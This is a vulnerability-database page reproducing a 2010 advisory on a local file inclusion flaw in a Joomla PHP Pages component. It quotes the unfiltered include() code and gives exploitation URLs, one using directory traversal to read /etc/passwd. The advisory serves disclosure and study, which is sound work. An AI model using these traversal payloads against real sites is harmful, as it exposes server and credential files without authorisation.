Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla Custom PHP Pages Local File Inclusion

🗓️ 12 May 2010 00:00:00Reported by Chip D3 Bi0sType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Joomla Custom PHP Pages Component LFI Vulnerability. Allows Local File Inclusio

Code
`  
Joomla Custom PHP Pages Component LFI Vulnerability  
=====================================================  
  
- Discovered by : Chip D3 Bi0s  
- Email : [email protected]  
- Date : 2010-05-11  
- Where : From Remote  
  
----------------------------------  
Affected software description  
  
Application : Joomla Custom PHP Pages Component   
Developer : Gabe  
Email : [email protected]  
Type : Non-Commercial  
License : GPL  
Date Added : 6 June 2008  
Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz  
  
  
I. BACKGROUND  
  
Joomla PHP Pages Component allows you to create simple PHP pages  
and link them to the Joomla Menu. This allows you to easily create  
a custom page without having to create a whole component. It is  
similar to the PHP Module for Joomla, except that it is a full Component.  
  
II. DESCRIPTION  
  
Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.  
  
  
III. ANALYSIS  
  
The bug is in the following files, specifying the lines  
  
/components/com_php/php.php  
  
[35] $filename = $Params->get('file', '');  
[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename;  
...  
[47] // evaluate the PHP  
[48] echo '<div class="php_page">';  
[49] if (is_file($path)) {  
[50] include($path);  
[51] } else {  
[52] echo '<span class="note">Please choose a File</span>';  
  
Explaining the above lines:  
According to the code that files are opened, but the code is not  
shows no filtration, so we can move into  
directories. According to several extensions can be observed as  
.html, .jpg, .js, which is not true of all .php  
  
  
  
IV. EXPLOITATION  
  
http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg  
http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js  
http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd  
  
  
+++++++++++++++++++++++++++++++++++++++  
[!] Produced in South America  
+++++++++++++++++++++++++++++++++++++++  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 May 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
joomla custom php pageslocal file inclusionlfi vulnerabilitygabenon-commercialgplchip d3 bi0s2010-05-11remotevulnerability analysis
24